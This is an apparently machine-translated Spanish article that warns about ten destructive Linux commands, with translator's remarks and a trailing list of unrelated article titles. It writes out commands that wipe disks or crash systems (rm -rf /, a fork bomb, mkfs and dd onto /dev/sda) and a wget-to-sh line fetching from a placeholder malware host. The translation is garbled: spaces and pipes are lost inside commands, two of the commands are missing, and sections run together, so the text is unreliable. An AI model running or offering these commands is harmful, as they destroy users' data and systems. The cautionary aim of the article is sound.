La línea de comandos de Linux es útil, eficiente y divertida, pero a veces peligrosa, especialmente si no está seguro de lo que está haciendo. Los siguientes comandos generalmente no tienen permiso para jugar estúpidamente hasta el extremo: bajo la identidad del usuario común, ¡la destrucción es solo la propia bodega de tres puntos de un acre!
1, comando rm-rf
El comando rm-rf es una de las formas más rápidas de eliminar una carpeta y su contenido. Solo un poco de error o ignorancia puede llevar a un colapso del sistema irrecuperable. Las siguientes son algunas de las opciones para el comando rm.
El comando rm se usa generalmente para eliminar archivos en Linux.
El comando rm-r borra recursivamente las carpetas, incluso las carpetas vacías.
(Anotación: personalmente piense que esto debería ser incorrecto, desde el sentido común, debería ser "incluso una carpeta no vacía")
el comando rm-f se puede eliminar sin preguntar y lsquo; solo lectura Archivo ’.
(Anotación: a los archivos de eliminación de Linux no les importa si el archivo es de solo lectura, pero si el directorio principal tiene permiso de escritura. Por lo tanto, el parámetro -f simplemente significa que no tiene que eliminar la confirmación una por una, sino que se eliminará de manera silenciosa. El comando rm original no elimina realmente la solicitud, pero la distribución general agregará rm por alias al parámetro -i para solicitar la confirmación de eliminación, y -f suprimirá esta solicitud.)
rm- Rf /: Fuerza la eliminación de todas las raíces en el directorio raíz.
(Es decir, después de eliminar, no hay nada … …)
rm-rf *: fuerza la eliminación de todos los archivos en el directorio actual.
rm-rf .: Fuerza la eliminación de la carpeta actual y sus subcarpetas.
De ahora en adelante, tenga cuidado cuando desee ejecutar el comando rm-rf. Podemos crear un alias rm-i en el comando " .bashrc " archivo ‘ rm ‘ para evitar accidentes al eliminar archivos con el comando ‘ rm ‘ el cual le pedirá que confirme cada solicitud de eliminación.
(Anotación: la mayoría de las distribuciones ya lo han hecho, si no, hágalo, y debe considerar lo que está haciendo antes de usar el parámetro -f. El traductor mismo tiene una lección de sangre y lágrimas.)
2,: () {:: &};: Command
Este es un ejemplo de una bomba de bifurcación. La operación específica es definir una función llamada ‘: ‘, se llamará a sí misma dos veces, una en primer plano y otra en segundo plano. Se ejecutará repetidamente hasta que el sistema se bloquee.
Oh? ¿Seguro que quieres probarlo? No experimente en el servidor oficial de la compañía ~~
3, Comando > /dev /sda
El comando anterior escribirá la salida de un ‘ comando ‘ Bloquear dispositivo /dev /sda. Esta operación reemplaza todos los bloques de datos en el dispositivo de bloque con los datos originales escritos por el comando, lo que resulta en la pérdida de datos para todo el dispositivo de bloque.
4, mv folder /dev /null
Este comando moverá algunas carpetas ‘ ‘ a /dev /null. En Linux, el dispositivo /dev /null o null es un archivo especial, todos los datos escritos en él se borrarán, y luego la operación de escritura será exitosa.
(Anotación: esto es un agujero negro. Por supuesto, debe tenerse en cuenta que al mover la carpeta al agujero negro, no impide el canje del software de recuperación de datos, por lo que la destrucción completa real requiere software o técnicas especiales para completar y mdash; — sé que definitivamente tienes algo que eliminar.)
El comando anterior moverá todos los contenidos del directorio de Usuario a /dev /null, lo que significa todo Ambos están involucrados en y rsquo; agujero negro (nulo).
5, wgethttp: //malware_source-O- sh
El comando anterior descargará un script de una fuente (quizás) maliciosa y lo ejecutará. El comando Wget descargará el script, y sh (incondicionalmente) ejecutará el script descargado.
Nota: siempre debe prestar atención a la fuente de su paquete de descarga o script. Utilice solo los scripts /programas que se descargan de una fuente confiable.
(Anotación: Entonces, ¿realmente sabe lo que está haciendo? Cuando se trata de esta necesidad, mi enfoque es simplificarlo, luego leeré lo que escribí y luego consideraré si implementarlo. )
6, mkfs.ext3 /dev /sda
el comando anterior formatear el dispositivo de bloque y lsquo; SDA y rsquo;, que sin duda sabe que su comando en la ejecución del bloque anterior El dispositivo (disco duro) será formateado, ¡nuevo! Sin ningún tipo de datos, deje que su sistema llegue a una fase irrecuperable.
(Anotación: por lo general, no use directamente dispositivos como /dev /sda, a menos que se use como un dispositivo sin formato, generalmente se debe dividir en sda1, sda2 y otras particiones. Por supuesto, si usa sda o sda1, entonces Mkfs es devastador para los dispositivos de bloque o particiones, y los datos anteriores se evaporarán.)
7, Los comandos anteriores a menudo se usan para vaciar el contenido del archivo. Por lo general, se utiliza para registrar la salida del comando, pero confirme que el archivo de salida esté vacío o no exista antes de la ejecución, de lo contrario, el archivo original no podrá recuperarse. &Mdash; — es posible que el software de recuperación de datos no pueda ayudarle. Además, creo que lo que realmente podría querer usar es " > > ", que agrega una nueva salida al archivo en lugar de actualizar ese archivo.). Si ingresa un error o una entrada ignorante con la ejecución anterior, el comando similar a " > xt.conf " sobrescribirá el archivo de configuración o cualquier otro archivo de configuración del sistema. 8, ^ foo ^ bar Este comando se describe en nuestro poco conocido comando de Linux, Parte 3, que se usa para editar comandos ejecutados previamente sin tener que volver a reproducir todo el comando. Pero cuando usa el comando foobar, si no comprueba a fondo el riesgo de cambiar el comando original, esto puede causar problemas reales. 9, ddif = /dev /randomof = /Dev /sda El comando anterior escribirá un archivo basura aleatorio en el dispositivo de bloque sda para borrar los datos. Por supuesto Su sistema puede estar en un estado de confusión e irrecuperable. 10 , comandos ocultos El siguiente comando es en realidad el primer comando anterior (rm-rf). El código aquí está oculto en hexadecimal, y un usuario ignorante puede ser engañado. Ejecutar el siguiente comando en el terminal puede borrar su partición raíz. Este comando indica que el peligro real suele estar oculto y no se detectará fácilmente. Siempre debes tener en cuenta lo que estás haciendo y lo que sucederá. No compile /ejecute código de fuentes desconocidas.
(Anotación: De hecho, este tipo de truco es lo que piensa el traductor, algunos piratas informáticos "ocultos" inútiles y dañinos dejados atrás en tiempos prehistóricos.)
(Anotación: ¿recuerde que decir que mv to black hole no puede eliminar completamente los datos? ¡Entonces este comando le da un método completamente eliminado! Por supuesto, por motivos de seguro, puede sobrescribir varias veces).
La cola de espera en el kernel de Linux tiene muchos usos para el manejo de interrupciones, sincroni
Como entusiasta de Linux, después de varias determinaciones, abandonó el sistema dual e instaló L
Informática Noticias de la tienda: primeros sistemas Linux para la puesta en marcha de panel plano
Gentoo Linux Caozuojitong (pronunciado /dʒɛntuː /) es un meta-distribución de las distribuciones de
Instalación de sistema Linux extensión php cURL
Explicación detallada de los parámetros del comando RPM en Linux
Redes con Linux Programación - servidor y función de la información del cliente
Linux cpio.gz archivo descompresión método
Comandos de canalización de Linux
Linux comando de vista de memoria libre
Alta disponibilidad de clusters de sistemas operativos Linux
Cómo desinstalar el software en Linux
Aplicación de comando de redireccionamiento bajo el sistema operativo Linux y su sintaxis
Sql * más el problema de devolución de llamada del comando de historial en Linux
¿Cómo resolver el fallo de parpadeo de la luz del disco duro de uso de la CPU de arranque de Win8?
Cómo hacer que el win7 de 32 bits use la memoria 4G ya no es una mentira
¿Cómo resolver la caducidad de la cuenta de Linux?
¿Qué debo hacer con la barra de búsqueda de win10?
Los permisos del sistema de Windows 7 controlan el funcionamiento automático de los dispositivos USB
Botón de encendido del sistema Windows 8 cómo agregar el modo de suspensión
Top 10 problemas de Windows 7 a resolver
Método de resolución de problemas de sonido de Windows Vista
Algunos usuarios de Win8 pueden actualizar Win8.1
Habilidades poco conocidas de creación de códigos PIN del sistema Win8